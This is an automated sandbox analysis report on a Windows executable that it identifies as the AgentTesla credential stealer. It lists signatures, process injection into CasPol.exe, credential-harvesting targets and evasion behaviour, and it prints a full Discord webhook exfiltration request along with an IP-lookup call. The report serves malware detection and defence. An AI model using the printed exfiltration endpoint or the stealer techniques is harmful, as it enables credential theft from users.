Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont-20230207.exe

Overview

General Information

Sample Name:e-dekont-20230207.exe
Analysis ID:800710
MD5:2fbaa4d917cce04617f24f87309286d6
SHA1:7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
SHA256:91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
Tags:exegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • e-dekont-20230207.exe (PID: 6072 cmdline: C:\Users\user\Desktop\e-dekont-20230207.exe MD5: 2FBAA4D917CCE04617F24F87309286D6)
    • CasPol.exe (PID: 6100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    Process Memory Space: CasPol.exe PID: 6100JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: CasPol.exe PID: 6100JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.5162.159.128.233496904432851779 02/07/23-18:31:33.991128
        SID:2851779
        Source Port:49690
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: e-dekont-20230207.exeReversingLabs: Detection: 25%
        Machine Learning detection for sample
        Source: e-dekont-20230207.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2
        Source: e-dekont-20230207.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49690 -> 162.159.128.233:443
        May check the online IP address of the machine
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:31:34 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=444c6840a70d11ed8760e6ba40672d66; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/strict-transport-security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Egxqsltc4qolLS4uzBaoE9%2FLaswRMsv8abKbQSPxREWUfQSPaTwB7kb7z0WOBsXz71TuPG8StdDXxsdUAHgNvhn4re6poX%2Bxo7O3WpOD0mQMHdrmzCmF8EGKAI5p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __sdcfduid=444c6840a70d11ed8760e6ba40672d66dd69c8ba71cb11fcdcb8dbf0ca98829aacc0c779c3c769b75f558a3581eb9a0f; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/Set-Cookie: __cfruid=e3626c59acba08201b37fef2fc963ccf5c710641-1675791094; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 795ddc215dd0368a-FRA{"message": "Unknown Webhook", "code": 10015}
        Source: CasPol.exe, 00000001.00000003.312705815.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.577672379.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.312026803.0000000005BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4Dp
        Source: unknownHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DAA0081_2_04DAA008
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DA9CC01_2_04DA9CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DAA8D81_2_04DAA8D8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DAC8981_2_04DAC898
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063782BA1_2_063782BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063701A01_2_063701A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063729EC1_2_063729EC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063717301_2_06371730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063717601_2_06371760
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0637BFF91_2_0637BFF9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063738581_2_06373858
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064DCDC81_2_064DCDC8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064D18481_2_064D1848
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064DA5DC1_2_064DA5DC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0687E0D01_2_0687E0D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0687B0E81_2_0687B0E8
        Source: e-dekont-20230207.exeStatic PE information: No import functions for PE file found
        Source: e-dekont-20230207.exe, 00000000.00000002.305649698.000000000106C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306294096.00000000133F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.305766749.00000000015E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exeBinary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e-dekont-20230207.exeReversingLabs: Detection: 25%
        Source: e-dekont-20230207.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\e-dekont-20230207.exe C:\Users\user\Desktop\e-dekont-20230207.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230207.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
        Source: e-dekont-20230207.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/an2.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/aN1.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/aH1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: e-dekont-20230207.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e-dekont-20230207.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: e-dekont-20230207.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: e-dekont-20230207.exe, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs.Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs.Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs.Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        .NET source code contains method to dynamically call methods (often used by packers)
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DA0007 push edi; retf 1_2_04DA0016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064DEC72 push es; ret 1_2_064DEC80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06871E87 push FFFFFF8Bh; iretd 1_2_06871E8B
        Source: e-dekont-20230207.exeStatic PE information: 0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.972775066304571
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csHigh entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csHigh entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csHigh entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
